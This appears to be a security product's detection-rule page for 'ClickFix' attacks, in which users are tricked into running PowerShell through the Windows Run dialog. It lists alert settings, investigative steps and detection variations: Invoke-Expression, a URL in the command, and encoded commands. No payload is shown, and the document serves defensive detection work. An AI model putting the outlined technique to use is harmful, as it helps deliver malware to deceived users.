Synopsis
Activation Period |
14 Days |
Training Period |
30 Days |
Test Period |
N/A (single event) |
Deduplication Period |
1 Day |
Required Data |
|
Detection Modules |
|
Detector Tags |
|
ATT&CK Tactic |
|
ATT&CK Technique |
|
Severity |
Low |
Description
An attacker may be trying to trick a user to execute PowerShell through the run application.
Attacker's Goals
- An attacker may be trying to trick a user to execute PowerShell through the run application.
Investigative actions
- Check if the command line is known in the organization or malicious.
- And ask the user what is the source of it.
Variations
ClickFix - PowerShell command executed through the run application and using Invoke-Expression cmdletClickFix - Long PowerShell command executed through the run application with URL in the command
ClickFix - Long encoded PowerShell command executed through the run application